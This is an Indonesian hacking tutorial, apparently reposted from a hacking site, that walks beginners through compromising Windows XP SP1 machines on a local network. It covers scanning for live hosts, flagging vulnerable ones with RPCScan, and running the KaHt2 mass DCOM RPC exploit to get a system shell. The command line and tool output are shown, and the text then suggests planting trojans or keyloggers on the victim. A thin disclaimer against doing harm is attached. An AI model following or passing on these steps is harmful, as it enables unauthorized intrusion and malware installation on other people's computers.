Hacking jaringan dengan bug windows XP service pack 1 ke bawah
Sumber balihack.or.id
Tutorial ini murni hanya untuk pembelajaran (level pemula). Walaupun bugs udah sangat lama, tp untuk menambah wawasan sangat perlu. Basa basi cukup, sekarang alat alat yang dipakai :
1.RPCScan 2.03
2.Kaht2
3.Angry IP Scanner 2.21 http://www.winaddons.com/angry-ip-scanner-221/
4.Analisa ( tidak bikin pusing kok)
5.Secangkir anggur…..hee kopi maksun nya:P
Langkah pertama
Laptop/komputer kita sudah terhubung kejaringan dan mendapat alamat IP lokal. Cek IP kita. Misal IP kita dapat adalah 192.168.100.100 dengan subnet 255.255.0.0 berarti jika kita lihat, kita berada network type class C. Kemungkinan IP yang ada dijaringan tersebut adalah 192.168.0.0-192.168.255. Misalkan lagi alamat IP yang kita dapat 168.0.0.10 dengan subnet 255.255.255.0 berarti kita berada di network dengan type class B dan kemungkinan alamat IP yang dipakai antara 168.0.0.1-168.0.0.254
Langkah kedua
Buka program Angry IP Scanner 2.21, klik options lalu klik options lg, pada group display pilih only alive. Itu menandakan kita menampilkan komputer yang hidup saja. Alamat IP komputer yang hidup berwarna bulatan biru dan yang mati berwarna merah. Karena kita sudah tahu alamat yang mungkin pada jaringan tersebut tinggal kita masukkan IP range 192.168.0.0 to 192.168.255.255 (istilah kerennya scanning masal). waktu yang dibutuhkan untuk melakukan scaning IP tersebut memakan waktu yang lama, nah disaat seperti ini perlu rokok marlboro mentolnya he..he…! atau kalau anda tidak punya waktu banyak, cukup scan IP yang dekat dekat kita saja. Contoh alamat IP kita 192.168.100.100, IP yang kita scan adalah 192.168.100.1-192.168.100.254. setelah semua disetting klik START. Akan didapat komputer yang hidup (jika anda beruntung).
Langkah ketiga
Setelah kita mendapatkan komputer yang hidup. Sekarang buka RPCScan, masukkan alamat IP komputer yang hidup ke host name. Atau kita bisa memasukkan IP kita pada :
Start IP (awal IP yg di scanning)
End IP (akhir IP yg di scanning)
lalu tekan ->(masukkan semua IP yang hidup). Klik Start(tanda panah biru).Cek hasil scanning, jika status VULNERABLE berarti komputer dengan alamat IP tersebut masih menggunakan windows service pack 1 kebawah. Berarti anda beruntung….
Langkah keempat
Panggil program kaht2 anda..! misal alamat IP yang vulnerable 192.168.100.10
D: \hacking\tools\kaht2>kaht2
_________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION
________________________________________________
Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]
example: KaHt2.exe 192.168.0.0 192.168.255.255
NEW!: Macros Available in shell enviroment!!
Type !! for more info into a shell.
D: \hacking\tools\kaht2>kaht2 192.168.100.9 192.168.100.10
Jika berhasil masuk kekomputer target, command akan kita akan berubah menjadi
C:\WINDOWS\system32>
Berarti komputer tersebut sudah menjadi tanggung jawab anda, silahkan berkreasi sendiri. Mungkin dengan menanamkan trojan, keyloger dan lain2 tergantung tingkat kekejaman anda. Atau Cuma lihat semua isi drive nya. Tapi tidak dianjurkan untuk berbuat jahat…Ingat Dilarang Berbuat JAHAT
SMDhack crew yang baru Oroch1 selamat bergabung.